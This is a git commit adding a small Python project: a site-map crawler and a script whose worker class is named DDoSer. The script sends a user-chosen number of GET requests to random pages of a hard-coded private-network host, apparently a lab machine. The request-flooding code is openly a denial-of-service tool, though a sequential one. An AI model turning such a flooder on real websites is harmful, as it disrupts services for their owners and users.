This commit is contained in:
2020-04-19 22:53:20 +03:00
commit 6de8735eb5
3 changed files with 205 additions and 0 deletions

5
.gitignore vendored Normal file
View File

@@ -0,0 +1,5 @@
# gitignore patterns are relative to this file already; a leading "./" is
# not understood by git and makes the pattern match nothing.

# IDE / editor settings
.idea/
.vscode/

# Local virtual environment
/venv/

# Local database file
/data.db

# Python bytecode caches (any directory level)
__pycache__/

83
__init__.py Normal file
View File

@@ -0,0 +1,83 @@
import os
import link_extractor
import time
import random
import progressbar
# import urllib.request as requests # urlib
# import faster_than_requests as requests # faster_than_requests
import requests
from datetime import datetime
from threading import Thread
# NOTE: a ``global`` statement at module level has no effect, so none is used
# here; the request counters are created in the ``__main__`` block below.

# Make sure the directory that holds the cached site maps exists.
# ``exist_ok=True`` replaces the separate existence check, so there is no gap
# between checking for the directory and creating it.
os.makedirs('./maps/', exist_ok=True)
def url_grab(full_url):
    """Return the list of page URLs known for the site at *full_url*.

    The site map is cached in ``./maps/<full_url>``, one URL per line. When
    the cache file exists it is read back; otherwise the site is crawled with
    ``link_extractor.extractor('http://' + full_url)`` and the result is
    written to the cache file for later runs.

    Args:
        full_url: Site address without a scheme (``http://`` is prepended
            for the crawl). It is also used verbatim as the cache file name.

    Returns:
        A list of URL strings.
    """
    cache_path = f'./maps/{full_url}'
    if os.path.exists(cache_path):
        with open(cache_path, 'r', encoding='utf-8') as f:
            # Skip blank lines so callers never receive an empty URL.
            subUrls = [line for line in f.read().splitlines() if line]
    else:
        # Materialise the crawl result as a list: callers pick entries with
        # random.choice, which needs an indexable sequence.
        subUrls = [
            link.strip()
            for link in link_extractor.extractor('http://' + full_url)
        ]
        # Opening in 'w' mode creates the file, so no separate os.mknod call
        # (which is unavailable or privileged on some platforms) is needed.
        with open(cache_path, 'w', encoding='utf-8') as f:
            for link in subUrls:
                print(link, file=f)
    print(datetime.now().strftime('[%X] ') + 'Карта сайта получена')
    return subUrls
class DDoSer(Thread):
    """Worker thread that sends a single HTTP GET request to one URL.

    The outcome is recorded in the module-level counters
    ``requestCountExecuted`` (every finished attempt) and
    ``requestCountSuccess`` (responses with status code 200). Both counters
    must already exist as module globals before the thread is started.
    """

    def __init__(self, url, timeout=10):
        """Store the request target.

        Args:
            url: Address passed to ``requests.get``.
            timeout: Seconds to wait for the server before giving up, so a
                stalled connection cannot block the thread indefinitely.
        """
        super().__init__()
        self.url = url
        self.request_timeout = timeout

    def run(self):
        """Perform the request and update the global counters."""
        global requestCountSuccess, requestCountExecuted
        # responce = requests.urlopen(self.url).getcode() # urlib
        try:
            status = requests.get(
                self.url, timeout=self.request_timeout
            ).status_code
        except requests.RequestException:
            # A failed request is still a finished attempt: it must be
            # counted as executed (just not as successful), otherwise the
            # executed counter never reaches the requested total.
            status = None
        if status == 200:
            requestCountSuccess += 1
        requestCountExecuted += 1
if __name__ == '__main__':
    # Script entry point: load the site map, send the requested number of
    # GET requests to randomly chosen pages, then print a summary.

    # The target host is hard-coded.
    url = '192.168.56.102'
    # random.choice needs an indexable sequence, so force a list regardless
    # of what container url_grab hands back.
    subUrls = list(url_grab(url))
    requestCount = int(input(datetime.now().strftime('[%X] ') + 'Введите число запросов: '))
    print()
    startTime = time.time()
    requestCountExecuted = 0
    requestCountSuccess = 0
    with progressbar.ProgressBar(max_value=requestCount) as bar:
        for _ in range(requestCount):
            thread = DDoSer(random.choice(subUrls))
            thread.start()
            # Wait for this request to finish before issuing the next one.
            thread.join()
            bar.update(requestCountExecuted)
        # No polling loop is needed here: every worker has been joined, so
        # the counters cannot change any more. Spinning until the executed
        # counter reached requestCount would never end if a worker died
        # before incrementing it.
    elapsed = time.time() - startTime
    # Guard against a zero-length interval (e.g. zero requests on a coarse
    # clock) instead of raising ZeroDivisionError.
    rate = round(requestCountExecuted / elapsed) if elapsed > 0 else 0
    print('\n' + datetime.now().strftime('[%X] ') + 'Всего выслано запросов: ' + str(requestCountExecuted))
    print(datetime.now().strftime('[%X] ') + 'Успешных запросов: ' + str(requestCountSuccess))
    print(datetime.now().strftime('[%X] ') + 'Средняя скорость: ' + str(rate) + ' з/с')

117
link_extractor.py Normal file
View File

@@ -0,0 +1,117 @@
# https://github.com/x4nth055/pythoncode-tutorials/tree/master/web-scraping/link-extractor
import requests
from urllib.request import urlparse, urljoin
from bs4 import BeautifulSoup
import colorama
# Initialise colorama before any coloured output is printed.
colorama.init()

# Colour codes used when printing discovered links.
GREEN, GRAY, RESET = (
    colorama.Fore.GREEN,
    colorama.Fore.LIGHTBLACK_EX,
    colorama.Fore.RESET,
)

# Crawl state shared by the functions of this module:
# unique links that belong to the crawled site ...
internal_urls = set()
# ... unique links that point elsewhere ...
external_urls = set()
# ... and the number of pages fetched so far.
total_urls_visited = 0
def is_valid(url):
    """
    Tells whether `url` has both a scheme and a network location.
    Returns True only when neither part is empty.
    """
    parts = urlparse(url)
    if not parts.netloc:
        return False
    return bool(parts.scheme)
def get_all_website_links(url, timeout=10):
    """
    Returns the URLs found on the page at `url` that belong to the same
    website and have not been recorded as internal links before.

    Every new internal link is also added to the global `internal_urls` set
    and every new external link to the global `external_urls` set; both
    kinds are printed as they are discovered.

    params:
        url (str): absolute address of the page to download and scan.
        timeout (float): seconds to wait for the server response, so a
            stalled server cannot hang the crawl.
    """
    # all new internal URLs found on `url`
    urls = set()
    # domain name of the URL without the protocol
    domain_name = urlparse(url).netloc
    page = requests.get(url, timeout=timeout)
    soup = BeautifulSoup(page.content, "html.parser")
    for a_tag in soup.find_all("a"):
        href = a_tag.attrs.get("href")
        if not href:
            # missing or empty href
            continue
        # join the URL if it's relative (not absolute link)
        parsed_href = urlparse(urljoin(url, href))
        # Validate BEFORE rebuilding the address: gluing "://" onto links
        # such as mailto: or javascript: would make them look like valid
        # URLs, and they cannot be fetched over HTTP anyway.
        if parsed_href.scheme not in ("http", "https") or not parsed_href.netloc:
            continue
        # remove URL GET parameters, URL fragments, etc.
        href = parsed_href.scheme + "://" + parsed_href.netloc + parsed_href.path
        if href in internal_urls:
            # already in the set
            continue
        # Compare against the host part only, so a foreign URL whose path
        # merely contains the domain name is not mistaken for an internal one
        # (sub-domains of the crawled domain still count as internal).
        if domain_name not in parsed_href.netloc:
            # external link
            if href not in external_urls:
                print(f"{GRAY}[!] External link: {href}{RESET}")
                external_urls.add(href)
            continue
        print(f"{GREEN}{href}{RESET}")
        urls.add(href)
        internal_urls.add(href)
    return urls
def crawl(url, max_urls=50):
    """
    Crawls a website starting at `url`, following internal links depth-first.
    You'll find all links in `external_urls` and `internal_urls` global set variables.

    The page counter `total_urls_visited` is a module global that is never
    reset here, so repeated calls share the same `max_urls` budget.

    params:
        url (str): page to start from; it is always fetched.
        max_urls (int): number of max urls to crawl, default is 50.
    """
    global total_urls_visited
    total_urls_visited += 1
    # An explicit stack of per-page link iterators replaces recursion, so the
    # nesting depth is not bounded by the interpreter's recursion limit when
    # `max_urls` is large. The visiting order is the same as with recursion.
    pending = [iter(get_all_website_links(url))]
    while pending and total_urls_visited <= max_urls:
        link = next(pending[-1], None)
        if link is None:
            # this page's links are exhausted; go back to its parent
            pending.pop()
            continue
        total_urls_visited += 1
        pending.append(iter(get_all_website_links(link)))
def extractor(url):
    """
    Crawls the website at `url` with the default page limit and returns the
    internal links collected so far.
    The returned object is the module-level `internal_urls` set itself,
    not a copy.
    """
    crawl(url=url)
    return internal_urls
if __name__ == "__main__":
    # Command-line entry point: crawl the given URL, print link totals and
    # save the internal and external links to two text files.
    import argparse

    cli = argparse.ArgumentParser(description="Link Extractor Tool with Python")
    cli.add_argument("url", help="The URL to extract links from.")
    cli.add_argument(
        "-m",
        "--max-urls",
        help="Number of max URLs to crawl, default is 30.",
        default=30,
        type=int,
    )
    args = cli.parse_args()
    url, max_urls = args.url, args.max_urls

    crawl(url, max_urls=max_urls)

    internal_total = len(internal_urls)
    external_total = len(external_urls)
    print("[+] Total Internal links:", internal_total)
    print("[+] Total External links:", external_total)
    print("[+] Total URLs:", external_total + internal_total)

    domain_name = urlparse(url).netloc
    # One output file per link category, internal links first; the files are
    # named after the crawled domain and hold one link per line.
    outputs = (
        (f"{domain_name}_internal_links.txt", internal_urls),
        (f"{domain_name}_external_links.txt", external_urls),
    )
    for out_path, links in outputs:
        with open(out_path, "w") as f:
            for link in links:
                print(link.strip(), file=f)